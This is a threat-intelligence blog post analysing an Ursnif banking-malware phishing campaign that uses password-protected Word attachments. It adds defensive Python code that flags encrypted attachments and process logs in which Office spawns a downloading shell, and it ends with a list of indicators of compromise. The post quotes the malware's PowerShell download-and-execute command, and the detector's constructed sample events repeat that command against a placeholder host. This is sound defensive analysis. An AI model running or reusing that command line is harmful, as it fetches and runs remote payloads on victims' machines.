
Wave of Ursnif Variants Leveraging Password-Protected Documents Continues to Spread Worldwide


We are experiencing a surge of attacks, across the globe, by the banking and spyware family Ursnif. As recently described in the blog My Online Security, the attackers send phishing emails pretending to originate from the Australian online payment company Eway. This campaign dates back to mid-February, at the latest, having compromised victims in North America, Western Europe, Australia and Japan.

The emails contain a password-protected Word document (docx). The password appears in the body of the email, which encourages the victim to use it to open the document. Because the attached document is password-protected, it evades detection by AV, anti-malware and sandboxing solutions. The sender, subject and content of the emails are all highly similar: each email is sent from an address in the newly registered domain ewaystore.info, and the subject announces an update on the receipt of an approved order or purchase. Here is an example of one of the emails’ content:

Figure 1 – the content of the email
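
A password-protected .docx is not a ZIP archive: Office stores it as an OLE compound file holding EncryptionInfo and EncryptedPackage streams, so a mail gateway can recognise the container even though it cannot read the content. The following is an added example, not code from the original article; the hold policy, the function names and the sample container are constructed for illustration.

```python
import re
import struct

CFB_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # OLE compound file signature
ZIP_MAGIC = b"PK\x03\x04"                       # unencrypted OOXML is a ZIP
MAX_REG_SECT = 0xFFFFFFFA                       # highest regular sector number
ENCRYPTION_STREAMS = {"EncryptionInfo", "EncryptedPackage"}

def cfb_entry_names(data):
    """Directory entry names of an OLE compound file, or None if it is not one."""
    if len(data) < 512 or data[:8] != CFB_MAGIC:
        return None
    shift = struct.unpack_from("<H", data, 30)[0]
    if shift not in (9, 12):
        return None
    size = 1 << shift

    def sector(n):
        return data[(n + 1) * size:(n + 2) * size]

    # Build the FAT from the 109 DIFAT slots in the header (DIFAT sectors
    # used by very large files are not followed here).
    fat = []
    for n in struct.unpack_from("<109I", data, 76):
        if n <= MAX_REG_SECT and len(sector(n)) == size:
            fat.extend(struct.unpack("<%dI" % (size // 4), sector(n)))

    names, seen = [], set()
    n = struct.unpack_from("<I", data, 48)[0]  # first directory sector
    while n <= MAX_REG_SECT and n not in seen and len(sector(n)) == size:
        seen.add(n)
        sec = sector(n)
        for off in range(0, size, 128):        # 128-byte directory entries
            name_len = struct.unpack_from("<H", sec, off + 64)[0]
            if sec[off + 66] != 0 and 2 <= name_len <= 64:  # type 0 = unused
                raw = sec[off:off + name_len - 2]
                names.append(raw.decode("utf-16-le", "replace"))
        n = fat[n] if n < len(fat) else 0xFFFFFFFE  # next in chain, or stop
    return names

def classify_attachment(data):
    """Classify attachment bytes by container type."""
    if data[:4] == ZIP_MAGIC:
        return "ooxml-zip"
    names = cfb_entry_names(data)
    if names is None:
        return "unknown"
    if ENCRYPTION_STREAMS <= set(names):
        return "encrypted-ooxml"
    return "ole-other"

def needs_hold(filename, data, body):
    """Assumed policy: hold an encrypted .docx whose email body offers a password."""
    return (filename.lower().endswith(".docx")
            and classify_attachment(data) == "encrypted-ooxml"
            and re.search(r"\bpassword\b", body, re.I) is not None)

def constructed_encrypted_sample():
    """Constructed container: header, one FAT sector, one directory sector."""
    header = bytearray(512)
    header[:8] = CFB_MAGIC
    struct.pack_into("<H", header, 30, 9)  # 512-byte sectors
    struct.pack_into("<I", header, 48, 1)  # directory starts at sector 1
    struct.pack_into("<109I", header, 76, 0, *([0xFFFFFFFF] * 108))
    fat = struct.pack("<128I", 0xFFFFFFFD, 0xFFFFFFFE, *([0xFFFFFFFF] * 126))

    def entry(name, kind):
        raw = (name + "\0").encode("utf-16-le")
        e = bytearray(128)
        e[:len(raw)] = raw
        struct.pack_into("<H", e, 64, len(raw))
        e[66] = kind
        return bytes(e)

    directory = (entry("Root Entry", 5) + entry("EncryptionInfo", 2)
                 + entry("EncryptedPackage", 2) + bytes(128))
    return bytes(header) + fat + directory
```

A held message can then be routed to manual review or to a sandbox that is given the password taken from the message body.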

Once opened, the Word document displays PDF and Excel icons (supposedly containing a receipt); clicking one invokes a PowerShell command that downloads and runs a malicious executable:

%ComSpec% /C PowerShell (New-Object System.Net.WebClient).DownloadFile('http://%URL_CONTAINING_PAYLOD%','%FILE_NAME%');Start-Process '%FILE_NAME%'
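
The command above leaves a recognisable trace in process-creation logs: an Office application spawning a shell whose command line downloads a file and then starts it. The following detection sketch is an added example, not code from the original article; the event field names, the `.example` URLs and the sample events are constructed.

```python
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
NAMES_FROM_REPORT = {"flash.exe", "player.exe"}  # file names named in the article
# PowerShell accepts typographic quotes as string delimiters, so fold them.
QUOTES = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'})
DOWNLOAD = re.compile(
    r"net\.webclient\s*\)\s*\.\s*downloadfile\s*\(\s*"
    r"['\"](?P<url>[^'\"]+)['\"]\s*,\s*['\"](?P<path>[^'\"]+)['\"]\s*\)", re.I)
LAUNCH = re.compile(r"start-process\s+['\"]?(?P<path>[^'\";\s]+)", re.I)

def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()

def normalize(cmdline):
    """Fold smart quotes and drop cmd.exe carets and PowerShell backticks."""
    return cmdline.translate(QUOTES).replace("^", "").replace("`", "")

def inspect_event(event):
    """Return a finding if an Office app spawned a shell that downloads a file."""
    if basename(event["parent_image"]) not in OFFICE_PARENTS:
        return None
    if basename(event["image"]) not in SHELLS:
        return None
    cmd = normalize(event["command_line"])
    dl = DOWNLOAD.search(cmd)
    if dl is None:
        return None
    run = LAUNCH.search(cmd, dl.end())
    dropped = basename(dl["path"])
    return {
        "url": dl["url"],
        "dropped": dl["path"],
        # True when the same file that was downloaded is started afterwards.
        "executed": run is not None and basename(run["path"]) == dropped,
        "known_name": dropped in NAMES_FROM_REPORT,
    }

def scan(events):
    return [f for f in map(inspect_event, events) if f is not None]

# Constructed process-creation events (not taken from the article).
CONSTRUCTED_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /C PowerShell (New-Object System.Net.WebClient)."
                     "DownloadFile('http://payload.example/a','flash.exe');"
                     "Start-Process 'flash.exe'"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\Users"},
    {"parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c Po^werShell (New-Object System.Net.WebClient). "
                     "DownloadFile (\u2018http://payload.example/b\u2019,"
                     "\u2018%TEMP%\\upd.exe\u2019)"},
]

if __name__ == "__main__":
    for finding in scan(CONSTRUCTED_EVENTS):
        print(finding)
```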

In most of the cases that we have observed, the executable downloaded by PowerShell is named “flash.exe” or “player.exe” and carries a Flash Player icon. Once run, this executable enumerates a long list of registry keys and collects information about the target. The information gathered is meant to assist in evasion, lay the groundwork for persistence and stealth, and provide initial reconnaissance about the target. The malware collects the OS version, product ID and installation date, registers as a top-level exception handler (a classic anti-debugging technique), modifies proxy settings, checks for existing Outlook and Windows Live Mail accounts and installed programs, and collects browser history and cache. The information gathered is written to randomly named files in the following location: %users\%user%\AppData\Local\Temp\%file_name%.
The files are deleted after being sent in HTTP POST requests to one of the many possible C2 servers.

Figure 2 – a data file created and deleted after posting to the C2 server


Communication with the C2 servers is done over SSL:

Figure 3 – DNS requests for a C2 server followed by an SSL handshake


At this point, a second-stage payload is dropped. Some variants drop the additional executable or DLL after decrypting a section in the original PE, and others download it from a C2 server. In either case, once the second-stage payload is loaded, code is injected into explorer.exe and execution continues from there:

Figure 4 – DLL dropped and loaded (sha256 716efba2287317a2c7a68947f966e7e6cbae1326cfa217873520330b0f7beb15)

An examination of the associated URLs and IP addresses revealed several interesting details. The infrastructure uses separate sets of IP addresses and URLs for dropping the payload (the ones the PowerShell script points to) and for communication while the malware runs. The PowerShell command points to several .au domain names; however, they all resolve to three IP addresses located in the US. The C2s used for communication at runtime seem to vary considerably between variants: different variants use different IP addresses and domain names, and the changes seem to be consistent with the times at which the different variants surfaced. Almost all IP addresses originate from Eastern Europe, predominantly Ukraine, as well as Romania and Germany. The continuing change in the C2s’ IP addresses and locations is most likely an effort on the attackers’ side to make the infrastructure more difficult to trace. Deep Instinct’s research team has been successful in expanding the number of known IOCs associated with this campaign.

It seems that Ursnif has come back on the scene, as we are witnessing several active phishing campaigns that are spreading Ursnif variants. A separate campaign spotted recently also uses password-protected documents as the initial dropper. In this related campaign, the documents embedded in the initial password-protected dropper invoke a malicious VBScript, which drops, decrypts and runs the payload.

Other than the .docx files, which evade detection, most payloads are not detected by the majority of security solutions for several days after they appear in the wild, leaving the door open for attackers to compromise many victims. Deep Instinct’s solution accurately detects all associated payloads by leveraging its strong, deep-learning-based capabilities to identify new, unseen malware.

IoC:

Droppers (doc files) SHA-256


Addresses used for serving payload
URLs

resilienceconsulting.com.au westonsocialgolfclub.com
windsorpc.com.au earlychildhoodconsulting.com.au
masterconstructions.com.au kwazii.com.au
dllfiles.org/dllfiles

 

IP Addresses

192.185.162.71
192.185.162.104
192.185.162.105


Malicious Payloads (PE)

C2 servers

URLs


IP Addresses


Associated Email addresses
customer@ewaystore[.]info
helpandcare@ewaystore[.]info

 
